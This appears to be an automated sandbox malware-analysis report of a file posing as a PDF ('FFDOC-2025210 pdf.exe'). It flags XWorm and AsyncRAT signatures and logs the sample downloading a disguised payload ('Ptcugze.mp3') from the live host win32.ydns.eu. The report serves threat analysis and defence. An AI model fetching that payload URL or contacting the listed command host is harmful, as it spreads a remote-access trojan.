                              Mar 4, 2025 08:58:14.772531033 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772564888 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772597075 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772609949 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.772650003 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772680998 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772701025 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.772713900 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772746086 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772756100 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.772808075 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772840977 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772859097 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.772874117 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772906065 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772929907 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.772938967 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772970915 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.772981882 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773004055 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773036003 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773070097 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773087025 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773119926 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773138046 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773153067 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773185015 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773196936 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773233891 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773271084 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773277998 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773312092 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773345947 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773363113 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773379087 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773411036 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773427010 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773444891 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773485899 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773494959 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773519993 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773542881 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773551941 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773571014 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773585081 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773617983 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773627996 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773650885 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773684025 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773700953 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773716927 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773749113 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773766994 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.773782969 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.773843050 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.825047016 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.825093985 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.825129986 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.825146914 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.859874010 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.859920025 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.859931946 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.901959896 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902000904 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902029991 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902035952 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902070999 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902097940 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902105093 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902141094 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902152061 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902174950 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902218103 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902267933 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902301073 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902348995 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902357101 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902386904 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902427912 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902436972 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902487040 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902519941 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902529001 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902570963 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902606010 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902618885 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902656078 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902699947 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902726889 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902761936 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902806044 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902828932 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902864933 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902898073 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902923107 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.902930975 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902981043 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.902987957 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903016090 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903048038 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903064966 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903098106 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903131008 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903146982 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903165102 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903199911 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903215885 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903249025 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903283119 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903292894 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903333902 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903367043 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903386116 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903400898 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903433084 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903455973 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903469086 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903501987 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903516054 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903533936 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903567076 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903587103 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903599977 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903634071 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903651953 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903666019 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903698921 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903718948 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903732061 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903764963 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903785944 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903798103 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903832912 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903851986 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:14.903867960 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:14.903923988 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:18.181149960 CET804970445.144.214.104192.168.2.5
                              Mar 4, 2025 08:58:18.181317091 CET4970480192.168.2.545.144.214.104
                              Mar 4, 2025 08:58:28.129657984 CET4970480192.168.2.545.144.214.104

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Mar 4, 2025 08:58:12.424395084 CET5006053192.168.2.51.1.1.1
                              Mar 4, 2025 08:58:12.438929081 CET53500601.1.1.1192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Mar 4, 2025 08:58:12.424395084 CET192.168.2.51.1.1.10x2d8fStandard query (0)win32.ydns.euA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Mar 4, 2025 08:58:12.438929081 CET1.1.1.1192.168.2.50x2d8fNo error (0)win32.ydns.eu45.144.214.104A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • win32.ydns.eu

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.54970445.144.214.104802276C:\Users\user\Desktop\FFDOC-2025210 pdf.exe
                              TimestampBytes transferredDirectionData
                              Mar 4, 2025 08:58:12.450103045 CET106OUTGET /never/lookinto/it/panel/uploads/Ptcugze.mp3 HTTP/1.1
                              Host: win32.ydns.eu
                              Connection: Keep-Alive
                              Mar 4, 2025 08:58:13.171596050 CET1236INHTTP/1.1 200 OK
                              Date: Tue, 04 Mar 2025 07:58:13 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                              Last-Modified: Tue, 04 Mar 2025 03:38:39 GMT
                              ETag: "fa608-62f7c022a23ba"
                              Accept-Ranges: bytes
                              Content-Length: 1025544
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: audio/mpeg
                              Data Raw: bc ec 52 20 58 20 22 fc 9c 93 9e d8 b1 a9 f2 f1 0d ab 3a 79 ce 23 62 d2 31 94 36 71 48 d8 b1 9e db 6c a7 0d d9 76 1a e9 56 9f f2 35 1f fa 98 e6 e1 00 4e 7e 4b 5c b4 92 fc d4 bb 79 ac e2 10 79 93 79 13 b5 86 05 6b 83 89 87 cd 26 ba dc 6b f4 84 a7 13 40 75 5b a1 60 8f 41 83 58 76 08 15 30 9a 95 99 65 c2 ee b0 30 14 18 49 84 34 a5 21 9b 88 38 45 bf 55 7b 2f b7 6f 4c 58 ff b5 0f 73 65 c3 0a 58 5d 4d 65 46 bd b5 6c 38 6c 97 03 74 16 92 48 91 19 fe 67 aa f7 ea e3 2f c0 36 97 32 ae 6e db 06 ae e1 e6 fa 2b fe 06 d0 de 62 15 ce 7d b3 3a be 43 6c 9e 75 4a 6d 46 7c e4 ec c2 1b d5 18 8e b6 11 d5 77 32 93 d7 c2 27 cc f4 1a d5 c7 75 c4 13 df ae 90 99 7b d6 72 a0 5a 47 4e 64 eb 39 4c 4e 01 15 41 fe a6 56 0f eb 05 81 f6 c9 61 91 7e 3d 0e 9e 12 b0 ec 07 b0 b5 5b 7c 2f 93 82 4f 57 6c a9 cc 72 29 ed f8 43 e7 99 60 a9 2d cc e9 77 50 ae 43 f2 85 4f bd 3b e1 95 99 f5 0b d6 52 ec 66 b9 c8 87 84 74 04 d3 37 7c 28 9a f0 38 07 f6 04 21 5a 04 7b 13 17 47 e8 b5 d9 c5 58 a1 de 47 3c ec fd 92 00 34 3b 00 95 e8 6b eb 7b 00 4d 2c [TRUNCATED]
                              Data Ascii: R X ":y#b16qHlvV5N~K\yyyk&k@u[`AXv0e0I4!8EU{/oLXseX]MeFl8ltHg/62n+b}:CluJmF|w2'u{rZGNd9LNAVa~=[|/OWlr)C`-wPCO;Rft7|(8!Z{GXG<4;k{M,hZu.P3+q@a3v=LP>?\EBwQ/uR[dC(~~7@0R?u>P"^'[>5 wdT>{}d+]%ZdOHXI\9PdB'?x~AD['?ZUC]ABg#n>PHDMvpwp@gLd>xJ|:V]|;d~[pbUwb!n'Fs&g2,?k^)4a(Vdy#^!x%4rE3i-0U#L'K#7L}8JNb`TpQMQz4S+7K9M=joo! -(MHyt>*kT7($u7:`U{kaWGu d6n)UH
                              Mar 4, 2025 08:58:13.171641111 CET1236INData Raw: 5b cd 89 8b a3 0d 65 f6 14 e9 e3 e9 2d 1f dd bb a0 c8 b0 89 91 11 e6 96 c3 ad bf ba c4 3d 9c ba da 27 db 6a 69 37 6c 0d bf f0 85 bd 55 e2 c9 69 a9 86 d7 b1 38 1f fa c4 45 b1 5f 6e 47 7c f2 9b db cc 74 d8 fc 54 96 7c b6 20 3a fb 8a e6 b5 b6 54 60
                              Data Ascii: [e-='ji7lUi8E_nG|tT| :T`.NI>Ok8Y'~|a\fS/G*A^a!dMNEj/B~aq1+dFN-5`iw{38$Ur1-%VBM@m
                              Mar 4, 2025 08:58:13.171695948 CET448INData Raw: 68 83 ca 26 8f 76 50 72 0d 9d 18 cc d8 ef 39 a7 b1 91 60 57 4a 72 c6 a6 77 25 95 44 af 96 a9 46 a6 66 5c 82 7c 98 52 1b 8f 45 7e 21 91 5b 01 d9 f7 42 d1 26 70 17 9c a4 b6 39 8c a2 ce bb 38 10 93 09 f5 3e 3e 93 48 87 58 f8 87 68 e8 34 d9 70 1e c1
                              Data Ascii: h&vPr9`WJrw%DFf\|RE~![B&p98>>HXh4p xBEI^\?!N/&/e[=K"Bl*]W7f,XRoc/RA~Etdk1$.]+*B]g~aE(- g\AcQt>(%O
                              Mar 4, 2025 08:58:13.171731949 CET1236INData Raw: 67 67 81 af 84 8c 9c 82 38 56 60 eb a7 45 42 70 fa 7f 50 69 8e 05 ec 25 27 fd 8d 34 cd a9 ca 1a b0 a8 c0 48 89 db 58 c0 cb d4 60 2a a2 25 d9 64 2e 14 46 60 5b 4e 2c 83 f3 6b 75 ad 86 0e 8a 2b 7f 46 dc 34 38 36 6c 3c c7 af 92 e8 22 21 23 d4 dd b2
                              Data Ascii: gg8V`EBpPi%'4HX`*%d.F`[N,ku+F486l<"!#-C<63uk"d34EkaSCl' gY}*f/rDtK=NuZ*;]v8fZ>qJ
                              Mar 4, 2025 08:58:13.171766043 CET1236INData Raw: 06 4a 80 0b 10 09 44 bc 28 16 1a bc 5a 54 79 00 53 2c fe 8b 09 04 68 4e c4 b2 69 24 c9 1e 22 5f 3e 99 8d 91 a5 f8 a3 4f 4e f7 90 06 5d 75 17 ef 85 37 75 13 21 d6 f8 4c e7 6c aa 22 07 3a 2e c7 53 49 26 6a eb 07 69 42 40 f3 c7 ef 22 77 a8 18 cb 13
                              Data Ascii: JD(ZTyS,hNi$"_>ON]u7u!Ll":.SI&jiB@"wZwW0!=`/0OW|8#QKb:&;OTO|N)"L&jB}=ljm?w~zd;~?xmp[l2~OR//T'}b[)
                              Mar 4, 2025 08:58:13.171798944 CET1236INData Raw: 5b aa 35 08 df 90 51 f6 65 47 7f 5b 7b 3c e2 d3 9b 16 13 18 10 44 aa 25 5a 3b 64 4a 51 be 67 96 90 04 97 50 85 aa 75 a7 24 16 57 dc 0b 62 97 4f 98 66 fd 7c 14 f6 55 97 91 20 7d 2c ba 4c 23 9c 2c 26 78 00 c5 f9 2c 1c f3 07 95 1d 78 e0 db 04 8f f1
                              Data Ascii: [5QeG[{<D%Z;dJQgPu$WbOf|U },L#,&x,xN9 2@;nqhm/l\:h$e&T9i5M'E<j#{lb8Q(?Xfq6L,[ey2p^|})>o^\cXZ=e_[/p}\5>2
                              Mar 4, 2025 08:58:13.171833038 CET1236INData Raw: 9c 1e 61 ba 62 3b b4 e2 cb cf 69 fa f0 9f 96 38 e5 94 91 5f 3f 4e 6d 93 22 b3 3f fd 87 06 35 e1 91 b1 0c 42 a2 18 bc e8 72 08 9a 28 46 b7 45 f8 53 16 07 73 0c 4d d5 6c 05 f1 ac bf 77 14 a4 66 6c 85 67 f5 8f 43 63 57 24 4a 7f 4a 41 c1 3c 56 d5 e6
                              Data Ascii: ab;i8_?Nm"?5Br(FESsMlwflgCcW$JJA<V)dwx]os$`vOY:[,t')U)xm3zmbHG!rTOVVn~G0#@CI5gUpS:d-KAQI28X
                              Mar 4, 2025 08:58:13.171868086 CET1236INData Raw: 5a 63 2c 23 d0 3a b1 b5 34 c3 45 bb 42 81 ba e2 2a 31 f3 34 51 85 17 10 6d 72 56 7a 59 4a dd 41 fc 22 af 81 b8 7b 71 23 46 33 da c5 fc cb 61 e7 6d 69 ba 19 c8 96 2e 6f 0b bd 06 f1 e5 34 1a bf c1 d0 33 e9 5e 20 03 bd e9 59 12 31 b6 5f 9b 03 7b 60
                              Data Ascii: Zc,#:4EB*14QmrVzYJA"{q#F3ami.o43^ Y1_{`hWG >E(y9B{lYTo}+k7xa?`M-".I7QT6d_RiR :fveGO%'CsI)W7G6c%`0SKR#,`_Z,0
                              Mar 4, 2025 08:58:13.171900988 CET1236INData Raw: b0 cb 06 ec 14 e9 74 c0 a0 e1 9b c5 d2 6a 14 b1 e5 11 b4 7b 73 01 de 72 d0 a9 7a bb 0b 94 d1 bc 87 c1 c6 73 02 40 18 7e f3 1e 58 a1 9a c0 43 fb d9 2d 9e d7 82 fd 5d 65 af 5c 86 fe 41 ac 6e 9f 4e 55 1f a9 26 0c a6 b9 f4 4e 4a 53 48 f2 18 4a 48 02
                              Data Ascii: tj{srzs@~XC-]e\AnNU&NJSHJH'bkz//n(xt~~!UGz-rR8|o"Vb=YS]Fc0298:B.I."KG;k%teX>3Qo|Ypy-
                              Mar 4, 2025 08:58:13.171937943 CET776INData Raw: 2c 0e 89 28 d6 2e 8b 17 3e 2b cb c6 33 a6 38 14 5b 74 63 46 ab f5 7d 5d 35 4a c5 29 be d1 39 e2 38 fd ba 1e 4b 0d 74 71 ba 2a 5f 5d 96 ce 4b 63 61 d6 db 84 b0 20 17 f5 32 3a 6e b2 96 cb 61 84 a5 f4 71 0a 27 ae a0 61 61 bb 4e 6a 60 56 a4 07 e9 f2
                              Data Ascii: ,(.>+38[tcF}]5J)98Ktq*_]Kca 2:naq'aaNj`VHo#xwod=qzSM#Sih,q<bQ}qnQ4y^l+%$7{e%=e<r`h[E}?P~&-mVTNRg=<.)D!k[
                              Mar 4, 2025 08:58:13.177012920 CET1236INData Raw: c1 16 a4 b7 e5 05 20 e3 5a a3 c3 bc 42 ea 70 96 64 6c 5b de 7b b5 f2 13 c4 b0 c4 c7 77 4c 48 a3 83 24 ff cb 5f aa 48 44 4c 5a 88 d7 26 72 93 5b 21 44 9c e6 36 e8 a4 7e ac 63 e0 ae 22 54 88 63 59 e7 03 40 82 20 35 6a 7f 8e 85 ae ca 03 a1 fe 95 0e
                              Data Ascii: ZBpdl[{wLH$_HDLZ&r[!D6~c"TcY@ 5jHIE[jrBU$<MwVDlL5a,_iPH Mc+;J.i~W2DetxOMD1I,9#1&


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:02:58:11
                              Start date:04/03/2025
                              Path:C:\Users\user\Desktop\FFDOC-2025210 pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\FFDOC-2025210 pdf.exe"
                              Imagebase:0xf0000
                              File size:326'656 bytes
                              MD5 hash:D8EA07F0F0072E6AE8AC3B7996941EB7
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2211197275.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2192389813.0000000002732000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2192389813.0000000002732000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:2
                              Start time:02:58:24
                              Start date:04/03/2025
                              Path:C:\Users\user\Desktop\FFDOC-2025210 pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\FFDOC-2025210 pdf.exe"
                              Imagebase:0x800000
                              File size:326'656 bytes
                              MD5 hash:D8EA07F0F0072E6AE8AC3B7996941EB7
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:6
                              Start time:02:58:28
                              Start date:04/03/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 932
                              Imagebase:0x40000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Executed Functions

                                Function 0087242E Relevance: .2, Instructions: 204COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b5e16eaffa51dcc8b5ac7832d9b6da5f5ecfd4a0ef51a5e881473684d68d3b8b
                                • Instruction ID: 066542983719d9e809f7df28621b755206940211aa1610cb237156c82c815116
                                • Opcode Fuzzy Hash: b5e16eaffa51dcc8b5ac7832d9b6da5f5ecfd4a0ef51a5e881473684d68d3b8b
                                • Instruction Fuzzy Hash: 07911634A04108CFEB09CF59D484BA9B3F2FB89315F68C265D409AB3A9C778ED85CB11
                                Function 00871812 Relevance: .2, Instructions: 188COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6833b4519372767ad255c68d1eb41fb273e1f324e0897c18f599c91f1841abde
                                • Instruction ID: 7dfaeb109db72b1c9652361c88e07585c83c33df888632c3ab363f9bd44efd80
                                • Opcode Fuzzy Hash: 6833b4519372767ad255c68d1eb41fb273e1f324e0897c18f599c91f1841abde
                                • Instruction Fuzzy Hash: 3F812934A042088FDB15CF68D9487E9BBF2FB89324F1981A5D409EB6A9D7349C85CB11
                                Function 00871A18 Relevance: .2, Instructions: 177COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7a9649aee528afb1590ee36a10f5440a1026a368c11b97266f725e90e0b0439
                                • Instruction ID: 689cb341a0d94433813e9bab3d22ee465fc15a76358836efef42a453c2257e7f
                                • Opcode Fuzzy Hash: e7a9649aee528afb1590ee36a10f5440a1026a368c11b97266f725e90e0b0439
                                • Instruction Fuzzy Hash: BF712834A04208CFDB15CF68D548BE9B7F2FB99324F1981A5D409EB669D734AC85CB11
                                Function 0605FBB0 Relevance: .2, Instructions: 155COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 10b494745b2df3bc5c7177dae39e71e329cef4da55019d1be0aa32cce5d63a42
                                • Instruction ID: 9e1196f0e268732d8104b811a92133e5ad166ba32cecb977cfa326584c59cefb
                                • Opcode Fuzzy Hash: 10b494745b2df3bc5c7177dae39e71e329cef4da55019d1be0aa32cce5d63a42
                                • Instruction Fuzzy Hash: 71513A74A4110ACFDB44DFA9D984AAEBBF6FF88300F158525E805EB344D7389986CF90
                                Function 06044255 Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: !$5
                                • API String ID: 0-1637208128
                                • Opcode ID: 2450aed59a922b0f0b15bb63ff4a25be2645932784026ea6306746f5c236ff93
                                • Instruction ID: 6327ed646b2f61e573fa49aedd4a851943fb5c717328f5c7158145553c963785
                                • Opcode Fuzzy Hash: 2450aed59a922b0f0b15bb63ff4a25be2645932784026ea6306746f5c236ff93
                                • Instruction Fuzzy Hash: 9621D4B0D4122DCFDBB4EF14D889BD9BAB4EB48304F0040E9D11AA7254DB745AC4CF52
                                Function 00873267 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
